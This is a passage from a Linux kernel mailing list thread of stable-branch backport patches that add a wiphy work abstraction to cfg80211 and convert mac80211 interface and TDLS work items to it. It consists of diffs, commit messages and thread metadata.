@@ * Copyright 2006-2007 Jiri Benc <jbenc@suse.cz> * Copyright 2008-2010 Johannes Berg <johannes@sipsolutions.net> * Copyright 2013-2014 Intel Mobile Communications GmbH + * Copyright 2021-2023 Intel Corporation */ #include <linux/export.h> @@ -716,8 +717,8 @@ static void ieee80211_report_used_skb(struct ieee80211_local *local, if (qskb) { skb_queue_tail(&sdata->status_queue, qskb); - ieee80211_queue_work(&local->hw, - &sdata->work); + wiphy_work_queue(local->hw.wiphy, + &sdata->work); } } } else { diff --git a/net/mac80211/util.c b/net/mac80211/util.c index 07512f0d5576..5b1799dfa675 100644 --- a/net/mac80211/util.c +++ b/net/mac80211/util.c @@ -2679,7 +2679,7 @@ int ieee80211_reconfig(struct ieee80211_local *local) /* Requeue all works */ list_for_each_entry(sdata, &local->interfaces, list) - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } ieee80211_wake_queues_by_reason(hw, IEEE80211_MAX_QUEUE_MAP, -- 2.53.0.rc2.2.g2258446484
{ "author": "=?UTF-8?q?Hanne-Lotta=20M=C3=A4enp=C3=A4=C3=A4?= <hannelotta@gmail.com>", "date": "Mon, 2 Feb 2026 18:50:37 +0200", "thread_id": "20260202165038.215693-3-hannelotta@gmail.com.mbox.gz" }
lkml
[PATCH 5.15.y 1/3] wifi: cfg80211: add a work abstraction with special semantics
From: Johannes Berg <johannes.berg@intel.com> [ Upstream commit a3ee4dc84c4e9d14cb34dad095fd678127aca5b6 ] Add a work abstraction at the cfg80211 level that will always hold the wiphy_lock() for any work executed and therefore also can be canceled safely (without waiting) while holding that. This improves on what we do now as with the new wiphy works we don't have to worry about locking while cancelling them safely. Also, don't let such works run while the device is suspended, since they'll likely need to interact with the device. Flush them before suspend though. Signed-off-by: Johannes Berg <johannes.berg@intel.com> Signed-off-by: Hanne-Lotta Mäenpää <hannelotta@gmail.com> --- include/net/cfg80211.h | 95 ++++++++++++++++++++++++++++++-- net/wireless/core.c | 121 +++++++++++++++++++++++++++++++++++++++++ net/wireless/core.h | 7 +++ net/wireless/sysfs.c | 8 ++- 4 files changed, 226 insertions(+), 5 deletions(-) diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h index 66a75723f559..392576342661 100644 --- a/include/net/cfg80211.h +++ b/include/net/cfg80211.h @@ -5301,12 +5301,17 @@ struct cfg80211_cqm_config; * wiphy_lock - lock the wiphy * @wiphy: the wiphy to lock * - * This is mostly exposed so it can be done around registering and - * unregistering netdevs that aren't created through cfg80211 calls, - * since that requires locking in cfg80211 when the notifiers is - * called, but that cannot differentiate which way it's called. + * This is needed around registering and unregistering netdevs that + * aren't created through cfg80211 calls, since that requires locking + * in cfg80211 when the notifiers is called, but that cannot + * differentiate which way it's called. + * + * It can also be used by drivers for their own purposes. * * When cfg80211 ops are called, the wiphy is already locked. + * + * Note that this makes sure that no workers that have been queued + * with wiphy_queue_work() are running. */ static inline void wiphy_lock(struct wiphy *wiphy) __acquires(&wiphy->mtx) @@ -5326,6 +5331,88 @@ static inline void wiphy_unlock(struct wiphy *wiphy) mutex_unlock(&wiphy->mtx); } +struct wiphy_work; +typedef void (*wiphy_work_func_t)(struct wiphy *, struct wiphy_work *); + +struct wiphy_work { + struct list_head entry; + wiphy_work_func_t func; +}; + +static inline void wiphy_work_init(struct wiphy_work *work, + wiphy_work_func_t func) +{ + INIT_LIST_HEAD(&work->entry); + work->func = func; +} + +/** + * wiphy_work_queue - queue work for the wiphy + * @wiphy: the wiphy to queue for + * @work: the work item + * + * This is useful for work that must be done asynchronously, and work + * queued here has the special property that the wiphy mutex will be + * held as if wiphy_lock() was called, and that it cannot be running + * after wiphy_lock() was called. Therefore, wiphy_cancel_work() can + * use just cancel_work() instead of cancel_work_sync(), it requires + * being in a section protected by wiphy_lock(). + */ +void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work); + +/** + * wiphy_work_cancel - cancel previously queued work + * @wiphy: the wiphy, for debug purposes + * @work: the work to cancel + * + * Cancel the work *without* waiting for it, this assumes being + * called under the wiphy mutex acquired by wiphy_lock(). + */ +void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work); + +struct wiphy_delayed_work { + struct wiphy_work work; + struct wiphy *wiphy; + struct timer_list timer; +}; + +void wiphy_delayed_work_timer(struct timer_list *t); + +static inline void wiphy_delayed_work_init(struct wiphy_delayed_work *dwork, + wiphy_work_func_t func) +{ + timer_setup(&dwork->timer, wiphy_delayed_work_timer, 0); + wiphy_work_init(&dwork->work, func); +} + +/** + * wiphy_delayed_work_queue - queue delayed work for the wiphy + * @wiphy: the wiphy to queue for + * @dwork: the delayable worker + * @delay: number of jiffies to wait before queueing + * + * This is useful for work that must be done asynchronously, and work + * queued here has the special property that the wiphy mutex will be + * held as if wiphy_lock() was called, and that it cannot be running + * after wiphy_lock() was called. Therefore, wiphy_cancel_work() can + * use just cancel_work() instead of cancel_work_sync(), it requires + * being in a section protected by wiphy_lock(). + */ +void wiphy_delayed_work_queue(struct wiphy *wiphy, + struct wiphy_delayed_work *dwork, + unsigned long delay); + +/** + * wiphy_delayed_work_cancel - cancel previously queued delayed work + * @wiphy: the wiphy, for debug purposes + * @dwork: the delayed work to cancel + * + * Cancel the work *without* waiting for it, this assumes being + * called under the wiphy mutex acquired by wiphy_lock(). + */ +void wiphy_delayed_work_cancel(struct wiphy *wiphy, + struct wiphy_delayed_work *dwork); + /** * struct wireless_dev - wireless device state * diff --git a/net/wireless/core.c b/net/wireless/core.c index d51d27ff3729..788ca1055d6a 100644 --- a/net/wireless/core.c +++ b/net/wireless/core.c @@ -410,6 +410,34 @@ static void cfg80211_propagate_cac_done_wk(struct work_struct *work) rtnl_unlock(); } +static void cfg80211_wiphy_work(struct work_struct *work) +{ + struct cfg80211_registered_device *rdev; + struct wiphy_work *wk; + + rdev = container_of(work, struct cfg80211_registered_device, wiphy_work); + + wiphy_lock(&rdev->wiphy); + if (rdev->suspended) + goto out; + + spin_lock_irq(&rdev->wiphy_work_lock); + wk = list_first_entry_or_null(&rdev->wiphy_work_list, + struct wiphy_work, entry); + if (wk) { + list_del_init(&wk->entry); + if (!list_empty(&rdev->wiphy_work_list)) + schedule_work(work); + spin_unlock_irq(&rdev->wiphy_work_lock); + + wk->func(&rdev->wiphy, wk); + } else { + spin_unlock_irq(&rdev->wiphy_work_lock); + } +out: + wiphy_unlock(&rdev->wiphy); +} + /* exported functions */ struct wiphy *wiphy_new_nm(const struct cfg80211_ops *ops, int sizeof_priv, @@ -535,6 +563,9 @@ struct wiphy *wiphy_new_nm(const struct cfg80211_ops *ops, int sizeof_priv, return NULL; } + INIT_WORK(&rdev->wiphy_work, cfg80211_wiphy_work); + INIT_LIST_HEAD(&rdev->wiphy_work_list); + spin_lock_init(&rdev->wiphy_work_lock); INIT_WORK(&rdev->rfkill_block, cfg80211_rfkill_block_work); INIT_WORK(&rdev->conn_work, cfg80211_conn_work); INIT_WORK(&rdev->event_work, cfg80211_event_work); @@ -1002,6 +1033,31 @@ void wiphy_rfkill_start_polling(struct wiphy *wiphy) } EXPORT_SYMBOL(wiphy_rfkill_start_polling); +void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev) +{ + unsigned int runaway_limit = 100; + unsigned long flags; + + lockdep_assert_held(&rdev->wiphy.mtx); + + spin_lock_irqsave(&rdev->wiphy_work_lock, flags); + while (!list_empty(&rdev->wiphy_work_list)) { + struct wiphy_work *wk; + + wk = list_first_entry(&rdev->wiphy_work_list, + struct wiphy_work, entry); + list_del_init(&wk->entry); + spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags); + + wk->func(&rdev->wiphy, wk); + + spin_lock_irqsave(&rdev->wiphy_work_lock, flags); + if (WARN_ON(--runaway_limit == 0)) + INIT_LIST_HEAD(&rdev->wiphy_work_list); + } + spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags); +} + void wiphy_unregister(struct wiphy *wiphy) { struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy); @@ -1040,9 +1096,14 @@ void wiphy_unregister(struct wiphy *wiphy) cfg80211_rdev_list_generation++; device_del(&rdev->wiphy.dev); + /* surely nothing is reachable now, clean up work */ + cfg80211_process_wiphy_works(rdev); wiphy_unlock(&rdev->wiphy); rtnl_unlock(); + /* this has nothing to do now but make sure it's gone */ + cancel_work_sync(&rdev->wiphy_work); + flush_work(&rdev->scan_done_wk); cancel_work_sync(&rdev->conn_work); flush_work(&rdev->event_work); @@ -1522,6 +1583,66 @@ static struct pernet_operations cfg80211_pernet_ops = { .exit = cfg80211_pernet_exit, }; +void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work) +{ + struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy); + unsigned long flags; + + spin_lock_irqsave(&rdev->wiphy_work_lock, flags); + if (list_empty(&work->entry)) + list_add_tail(&work->entry, &rdev->wiphy_work_list); + spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags); + + schedule_work(&rdev->wiphy_work); +} +EXPORT_SYMBOL_GPL(wiphy_work_queue); + +void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work) +{ + struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy); + unsigned long flags; + + lockdep_assert_held(&wiphy->mtx); + + spin_lock_irqsave(&rdev->wiphy_work_lock, flags); + if (!list_empty(&work->entry)) + list_del_init(&work->entry); + spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags); +} +EXPORT_SYMBOL_GPL(wiphy_work_cancel); + +void wiphy_delayed_work_timer(struct timer_list *t) +{ + struct wiphy_delayed_work *dwork = from_timer(dwork, t, timer); + + wiphy_work_queue(dwork->wiphy, &dwork->work); +} +EXPORT_SYMBOL(wiphy_delayed_work_timer); + +void wiphy_delayed_work_queue(struct wiphy *wiphy, + struct wiphy_delayed_work *dwork, + unsigned long delay) +{ + if (!delay) { + wiphy_work_queue(wiphy, &dwork->work); + return; + } + + dwork->wiphy = wiphy; + mod_timer(&dwork->timer, jiffies + delay); +} +EXPORT_SYMBOL_GPL(wiphy_delayed_work_queue); + +void wiphy_delayed_work_cancel(struct wiphy *wiphy, + struct wiphy_delayed_work *dwork) +{ + lockdep_assert_held(&wiphy->mtx); + + del_timer_sync(&dwork->timer); + wiphy_work_cancel(wiphy, &dwork->work); +} +EXPORT_SYMBOL_GPL(wiphy_delayed_work_cancel); + static int __init cfg80211_init(void) { int err; diff --git a/net/wireless/core.h b/net/wireless/core.h index 1720abf36f92..18d30f6fa7ca 100644 --- a/net/wireless/core.h +++ b/net/wireless/core.h @@ -103,6 +103,12 @@ struct cfg80211_registered_device { /* lock for all wdev lists */ spinlock_t mgmt_registrations_lock; + struct work_struct wiphy_work; + struct list_head wiphy_work_list; + /* protects the list above */ + spinlock_t wiphy_work_lock; + bool suspended; + /* must be last because of the way we do wiphy_priv(), * and it should at least be aligned to NETDEV_ALIGN */ struct wiphy wiphy __aligned(NETDEV_ALIGN); @@ -457,6 +463,7 @@ int cfg80211_change_iface(struct cfg80211_registered_device *rdev, struct net_device *dev, enum nl80211_iftype ntype, struct vif_params *params); void cfg80211_process_rdev_events(struct cfg80211_registered_device *rdev); +void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev); void cfg80211_process_wdev_events(struct wireless_dev *wdev); bool cfg80211_does_bw_fit_range(const struct ieee80211_freq_range *freq_range, diff --git a/net/wireless/sysfs.c b/net/wireless/sysfs.c index 0c3f05c9be27..4d3b65803010 100644 --- a/net/wireless/sysfs.c +++ b/net/wireless/sysfs.c @@ -5,7 +5,7 @@ * * Copyright 2005-2006 Jiri Benc <jbenc@suse.cz> * Copyright 2006 Johannes Berg <johannes@sipsolutions.net> - * Copyright (C) 2020-2021 Intel Corporation + * Copyright (C) 2020-2021, 2023 Intel Corporation */ #include <linux/device.h> @@ -105,14 +105,18 @@ static int wiphy_suspend(struct device *dev) cfg80211_leave_all(rdev); cfg80211_process_rdev_events(rdev); } + cfg80211_process_wiphy_works(rdev); if (rdev->ops->suspend) ret = rdev_suspend(rdev, rdev->wiphy.wowlan_config); if (ret == 1) { /* Driver refuse to configure wowlan */ cfg80211_leave_all(rdev); cfg80211_process_rdev_events(rdev); + cfg80211_process_wiphy_works(rdev); ret = rdev_suspend(rdev, NULL); } + if (ret == 0) + rdev->suspended = true; } wiphy_unlock(&rdev->wiphy); rtnl_unlock(); @@ -132,6 +136,8 @@ static int wiphy_resume(struct device *dev) wiphy_lock(&rdev->wiphy); if (rdev->wiphy.registered && rdev->ops->resume) ret = rdev_resume(rdev); + rdev->suspended = false; + schedule_work(&rdev->wiphy_work); wiphy_unlock(&rdev->wiphy); if (ret) -- 2.53.0.rc2.2.g2258446484
From: Johannes Berg <johannes.berg@intel.com> [ Upstream commit 777b26002b73127e81643d9286fadf3d41e0e477 ] Again, to have the wiphy locked for it. Reviewed-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com> Signed-off-by: Johannes Berg <johannes.berg@intel.com> [ Summary of conflict resolutions: - In mlme.c, move only tdls_peer_del_work to wiphy work, and none the other works ] Signed-off-by: Hanne-Lotta Mäenpää <hannelotta@gmail.com> --- net/mac80211/ieee80211_i.h | 4 ++-- net/mac80211/mlme.c | 7 ++++--- net/mac80211/tdls.c | 11 ++++++----- 3 files changed, 12 insertions(+), 10 deletions(-) diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h index 8d6616f646e7..306359d43571 100644 --- a/net/mac80211/ieee80211_i.h +++ b/net/mac80211/ieee80211_i.h @@ -542,7 +542,7 @@ struct ieee80211_if_managed { /* TDLS support */ u8 tdls_peer[ETH_ALEN] __aligned(2); - struct delayed_work tdls_peer_del_work; + struct wiphy_delayed_work tdls_peer_del_work; struct sk_buff *orig_teardown_skb; /* The original teardown skb */ struct sk_buff *teardown_skb; /* A copy to send through the AP */ spinlock_t teardown_lock; /* To lock changing teardown_skb */ @@ -2494,7 +2494,7 @@ int ieee80211_tdls_mgmt(struct wiphy *wiphy, struct net_device *dev, size_t extra_ies_len); int ieee80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, const u8 *peer, enum nl80211_tdls_operation oper); -void ieee80211_tdls_peer_del_work(struct work_struct *wk); +void ieee80211_tdls_peer_del_work(struct wiphy *wiphy, struct wiphy_work *wk); int ieee80211_tdls_channel_switch(struct wiphy *wiphy, struct net_device *dev, const u8 *addr, u8 oper_class, struct cfg80211_chan_def *chandef); diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c index d147760e8389..25468d5e874a 100644 --- a/net/mac80211/mlme.c +++ b/net/mac80211/mlme.c @@ -4890,8 +4890,8 @@ void ieee80211_sta_setup_sdata(struct ieee80211_sub_if_data *sdata) INIT_WORK(&ifmgd->csa_connection_drop_work, ieee80211_csa_connection_drop_work); INIT_WORK(&ifmgd->request_smps_work, ieee80211_request_smps_mgd_work); - INIT_DELAYED_WORK(&ifmgd->tdls_peer_del_work, - ieee80211_tdls_peer_del_work); + wiphy_delayed_work_init(&ifmgd->tdls_peer_del_work, + ieee80211_tdls_peer_del_work); timer_setup(&ifmgd->timer, ieee80211_sta_timer, 0); timer_setup(&ifmgd->bcn_mon_timer, ieee80211_sta_bcn_mon_timer, 0); timer_setup(&ifmgd->conn_mon_timer, ieee80211_sta_conn_mon_timer, 0); @@ -6010,7 +6010,8 @@ void ieee80211_mgd_stop(struct ieee80211_sub_if_data *sdata) cancel_work_sync(&ifmgd->request_smps_work); cancel_work_sync(&ifmgd->csa_connection_drop_work); cancel_work_sync(&ifmgd->chswitch_work); - cancel_delayed_work_sync(&ifmgd->tdls_peer_del_work); + wiphy_delayed_work_cancel(sdata->local->hw.wiphy, + &ifmgd->tdls_peer_del_work); sdata_lock(sdata); if (ifmgd->assoc_data) { diff --git a/net/mac80211/tdls.c b/net/mac80211/tdls.c index 137be9ec94af..c2d7479c119a 100644 --- a/net/mac80211/tdls.c +++ b/net/mac80211/tdls.c @@ -21,7 +21,7 @@ /* give usermode some time for retries in setting up the TDLS session */ #define TDLS_PEER_SETUP_TIMEOUT (15 * HZ) -void ieee80211_tdls_peer_del_work(struct work_struct *wk) +void ieee80211_tdls_peer_del_work(struct wiphy *wiphy, struct wiphy_work *wk) { struct ieee80211_sub_if_data *sdata; struct ieee80211_local *local; @@ -1126,9 +1126,9 @@ ieee80211_tdls_mgmt_setup(struct wiphy *wiphy, struct net_device *dev, return ret; } - ieee80211_queue_delayed_work(&sdata->local->hw, - &sdata->u.mgd.tdls_peer_del_work, - TDLS_PEER_SETUP_TIMEOUT); + wiphy_delayed_work_queue(sdata->local->hw.wiphy, + &sdata->u.mgd.tdls_peer_del_work, + TDLS_PEER_SETUP_TIMEOUT); return 0; out_unlock: @@ -1425,7 +1425,8 @@ int ieee80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, } if (ret == 0 && ether_addr_equal(sdata->u.mgd.tdls_peer, peer)) { - cancel_delayed_work(&sdata->u.mgd.tdls_peer_del_work); + wiphy_delayed_work_cancel(sdata->local->hw.wiphy, + &sdata->u.mgd.tdls_peer_del_work); eth_zero_addr(sdata->u.mgd.tdls_peer); } -- 2.53.0.rc2.2.g2258446484
{ "author": "=?UTF-8?q?Hanne-Lotta=20M=C3=A4enp=C3=A4=C3=A4?= <hannelotta@gmail.com>", "date": "Mon, 2 Feb 2026 18:50:38 +0200", "thread_id": "20260202165038.215693-3-hannelotta@gmail.com.mbox.gz" }
lkml
[PATCH 6.1.y 1/2] wifi: mac80211: use wiphy work for sdata->work
From: Johannes Berg <johannes.berg@intel.com> [ Upstream commit 16114496d684a3df4ce09f7c6b7557a8b2922795 ] We'll need this later to convert other works that might be cancelled from here, so convert this one first. Signed-off-by: Johannes Berg <johannes.berg@intel.com> (cherry picked from commit 16114496d684a3df4ce09f7c6b7557a8b2922795) Signed-off-by: Hanne-Lotta Mäenpää <hannelotta@gmail.com> --- net/mac80211/ibss.c | 8 ++++---- net/mac80211/ieee80211_i.h | 2 +- net/mac80211/iface.c | 10 +++++----- net/mac80211/mesh.c | 10 +++++----- net/mac80211/mesh_hwmp.c | 6 +++--- net/mac80211/mlme.c | 6 +++--- net/mac80211/ocb.c | 6 +++--- net/mac80211/rx.c | 2 +- net/mac80211/scan.c | 2 +- net/mac80211/status.c | 6 +++--- net/mac80211/util.c | 2 +- 11 files changed, 30 insertions(+), 30 deletions(-) diff --git a/net/mac80211/ibss.c b/net/mac80211/ibss.c index 79d2c5505289..363e7e4fdd02 100644 --- a/net/mac80211/ibss.c +++ b/net/mac80211/ibss.c @@ -741,7 +741,7 @@ static void ieee80211_csa_connection_drop_work(struct work_struct *work) skb_queue_purge(&sdata->skb_queue); /* trigger a scan to find another IBSS network to join */ - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); sdata_unlock(sdata); } @@ -1242,7 +1242,7 @@ void ieee80211_ibss_rx_no_sta(struct ieee80211_sub_if_data *sdata, spin_lock(&ifibss->incomplete_lock); list_add(&sta->list, &ifibss->incomplete_stations); spin_unlock(&ifibss->incomplete_lock); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } static void ieee80211_ibss_sta_expire(struct ieee80211_sub_if_data *sdata) @@ -1721,7 +1721,7 @@ static void ieee80211_ibss_timer(struct timer_list *t) struct ieee80211_sub_if_data *sdata = from_timer(sdata, t, u.ibss.timer); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } void ieee80211_ibss_setup_sdata(struct ieee80211_sub_if_data *sdata) @@ -1856,7 +1856,7 @@ int ieee80211_ibss_join(struct ieee80211_sub_if_data *sdata, sdata->deflink.needed_rx_chains = local->rx_chains; sdata->control_port_over_nl80211 = params->control_port_over_nl80211; - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); return 0; } diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h index 64f8d8f2b799..6cc5bba2ba52 100644 --- a/net/mac80211/ieee80211_i.h +++ b/net/mac80211/ieee80211_i.h @@ -1046,7 +1046,7 @@ struct ieee80211_sub_if_data { /* used to reconfigure hardware SM PS */ struct work_struct recalc_smps; - struct work_struct work; + struct wiphy_work work; struct sk_buff_head skb_queue; struct sk_buff_head status_queue; diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c index e691ecdd2ad5..6818c9d852e8 100644 --- a/net/mac80211/iface.c +++ b/net/mac80211/iface.c @@ -43,7 +43,7 @@ * by either the RTNL, the iflist_mtx or RCU. */ -static void ieee80211_iface_work(struct work_struct *work); +static void ieee80211_iface_work(struct wiphy *wiphy, struct wiphy_work *work); bool __ieee80211_recalc_txpower(struct ieee80211_sub_if_data *sdata) { @@ -650,7 +650,7 @@ static void ieee80211_do_stop(struct ieee80211_sub_if_data *sdata, bool going_do RCU_INIT_POINTER(local->p2p_sdata, NULL); fallthrough; default: - cancel_work_sync(&sdata->work); + wiphy_work_cancel(sdata->local->hw.wiphy, &sdata->work); /* * When we get here, the interface is marked down. * Free the remaining keys, if there are any @@ -1224,7 +1224,7 @@ int ieee80211_add_virtual_monitor(struct ieee80211_local *local) skb_queue_head_init(&sdata->skb_queue); skb_queue_head_init(&sdata->status_queue); - INIT_WORK(&sdata->work, ieee80211_iface_work); + wiphy_work_init(&sdata->work, ieee80211_iface_work); return 0; } @@ -1707,7 +1707,7 @@ static void ieee80211_iface_process_status(struct ieee80211_sub_if_data *sdata, } } -static void ieee80211_iface_work(struct work_struct *work) +static void ieee80211_iface_work(struct wiphy *wiphy, struct wiphy_work *work) { struct ieee80211_sub_if_data *sdata = container_of(work, struct ieee80211_sub_if_data, work); @@ -1819,7 +1819,7 @@ static void ieee80211_setup_sdata(struct ieee80211_sub_if_data *sdata, skb_queue_head_init(&sdata->skb_queue); skb_queue_head_init(&sdata->status_queue); - INIT_WORK(&sdata->work, ieee80211_iface_work); + wiphy_work_init(&sdata->work, ieee80211_iface_work); INIT_WORK(&sdata->recalc_smps, ieee80211_recalc_smps_work); INIT_WORK(&sdata->activate_links_work, ieee80211_activate_links_work); diff --git a/net/mac80211/mesh.c b/net/mac80211/mesh.c index 9c9b47d153c2..434efb30c75f 100644 --- a/net/mac80211/mesh.c +++ b/net/mac80211/mesh.c @@ -44,7 +44,7 @@ static void ieee80211_mesh_housekeeping_timer(struct timer_list *t) set_bit(MESH_WORK_HOUSEKEEPING, &ifmsh->wrkq_flags); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } /** @@ -643,7 +643,7 @@ static void ieee80211_mesh_path_timer(struct timer_list *t) struct ieee80211_sub_if_data *sdata = from_timer(sdata, t, u.mesh.mesh_path_timer); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } static void ieee80211_mesh_path_root_timer(struct timer_list *t) @@ -654,7 +654,7 @@ static void ieee80211_mesh_path_root_timer(struct timer_list *t) set_bit(MESH_WORK_ROOT, &ifmsh->wrkq_flags); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } void ieee80211_mesh_root_setup(struct ieee80211_if_mesh *ifmsh) @@ -1018,7 +1018,7 @@ void ieee80211_mbss_info_change_notify(struct ieee80211_sub_if_data *sdata, for_each_set_bit(bit, &bits, sizeof(changed) * BITS_PER_BYTE) set_bit(bit, &ifmsh->mbss_changed); set_bit(MESH_WORK_MBSS_CHANGED, &ifmsh->wrkq_flags); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } int ieee80211_start_mesh(struct ieee80211_sub_if_data *sdata) @@ -1043,7 +1043,7 @@ int ieee80211_start_mesh(struct ieee80211_sub_if_data *sdata) ifmsh->sync_offset_clockdrift_max = 0; set_bit(MESH_WORK_HOUSEKEEPING, &ifmsh->wrkq_flags); ieee80211_mesh_root_setup(ifmsh); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); sdata->vif.bss_conf.ht_operation_mode = ifmsh->mshcfg.ht_opmode; sdata->vif.bss_conf.enable_beacon = true; diff --git a/net/mac80211/mesh_hwmp.c b/net/mac80211/mesh_hwmp.c index da9e152a7aab..50dba479246b 100644 --- a/net/mac80211/mesh_hwmp.c +++ b/net/mac80211/mesh_hwmp.c @@ -1,7 +1,7 @@ // SPDX-License-Identifier: GPL-2.0-only /* * Copyright (c) 2008, 2009 open80211s Ltd. - * Copyright (C) 2019, 2021-2022 Intel Corporation + * Copyright (C) 2019, 2021-2023 Intel Corporation * Author: Luis Carlos Cobo <luisca@cozybit.com> */ @@ -1025,14 +1025,14 @@ static void mesh_queue_preq(struct mesh_path *mpath, u8 flags) spin_unlock_bh(&ifmsh->mesh_preq_queue_lock); if (time_after(jiffies, ifmsh->last_preq + min_preq_int_jiff(sdata))) - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); else if (time_before(jiffies, ifmsh->last_preq)) { /* avoid long wait if did not send preqs for a long time * and jiffies wrapped around */ ifmsh->last_preq = jiffies - min_preq_int_jiff(sdata) - 1; - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } else mod_timer(&ifmsh->mesh_path_timer, ifmsh->last_preq + min_preq_int_jiff(sdata)); diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c index 1fb41e5cc577..8824460a2060 100644 --- a/net/mac80211/mlme.c +++ b/net/mac80211/mlme.c @@ -3168,7 +3168,7 @@ void ieee80211_sta_tx_notify(struct ieee80211_sub_if_data *sdata, sdata->u.mgd.probe_send_count = 0; else sdata->u.mgd.nullfunc_failed = true; - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } static void ieee80211_mlme_send_probe_req(struct ieee80211_sub_if_data *sdata, @@ -6031,7 +6031,7 @@ static void ieee80211_sta_timer(struct timer_list *t) struct ieee80211_sub_if_data *sdata = from_timer(sdata, t, u.mgd.timer); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } void ieee80211_sta_connection_lost(struct ieee80211_sub_if_data *sdata, @@ -6175,7 +6175,7 @@ void ieee80211_mgd_conn_tx_status(struct ieee80211_sub_if_data *sdata, sdata->u.mgd.status_acked = acked; sdata->u.mgd.status_received = true; - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } void ieee80211_sta_work(struct ieee80211_sub_if_data *sdata) diff --git a/net/mac80211/ocb.c b/net/mac80211/ocb.c index a57dcbe99a0d..fcc326913391 100644 --- a/net/mac80211/ocb.c +++ b/net/mac80211/ocb.c @@ -81,7 +81,7 @@ void ieee80211_ocb_rx_no_sta(struct ieee80211_sub_if_data *sdata, spin_lock(&ifocb->incomplete_lock); list_add(&sta->list, &ifocb->incomplete_stations); spin_unlock(&ifocb->incomplete_lock); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } static struct sta_info *ieee80211_ocb_finish_sta(struct sta_info *sta) @@ -157,7 +157,7 @@ static void ieee80211_ocb_housekeeping_timer(struct timer_list *t) set_bit(OCB_WORK_HOUSEKEEPING, &ifocb->wrkq_flags); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } void ieee80211_ocb_setup_sdata(struct ieee80211_sub_if_data *sdata) @@ -197,7 +197,7 @@ int ieee80211_ocb_join(struct ieee80211_sub_if_data *sdata, ifocb->joined = true; set_bit(OCB_WORK_HOUSEKEEPING, &ifocb->wrkq_flags); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); netif_carrier_on(sdata->dev); return 0; diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c index 42dd7d1dda39..a6636e9f5c08 100644 --- a/net/mac80211/rx.c +++ b/net/mac80211/rx.c @@ -229,7 +229,7 @@ static void __ieee80211_queue_skb_to_iface(struct ieee80211_sub_if_data *sdata, } skb_queue_tail(&sdata->skb_queue, skb); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); if (sta) sta->deflink.rx_stats.packets++; } diff --git a/net/mac80211/scan.c b/net/mac80211/scan.c index f1147d156c1f..58da59836884 100644 --- a/net/mac80211/scan.c +++ b/net/mac80211/scan.c @@ -503,7 +503,7 @@ static void __ieee80211_scan_completed(struct ieee80211_hw *hw, bool aborted) */ list_for_each_entry_rcu(sdata, &local->interfaces, list) { if (ieee80211_sdata_running(sdata)) - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } if (was_scanning) diff --git a/net/mac80211/status.c b/net/mac80211/status.c index 3a96aa306616..9a8fca897d9f 100644 --- a/net/mac80211/status.c +++ b/net/mac80211/status.c @@ -5,7 +5,7 @@ * Copyright 2006-2007 Jiri Benc <jbenc@suse.cz> * Copyright 2008-2010 Johannes Berg <johannes@sipsolutions.net> * Copyright 2013-2014 Intel Mobile Communications GmbH - * Copyright 2021-2022 Intel Corporation + * Copyright 2021-2023 Intel Corporation */ #include <linux/export.h> @@ -747,8 +747,8 @@ static void ieee80211_report_used_skb(struct ieee80211_local *local, if (qskb) { skb_queue_tail(&sdata->status_queue, qskb); - 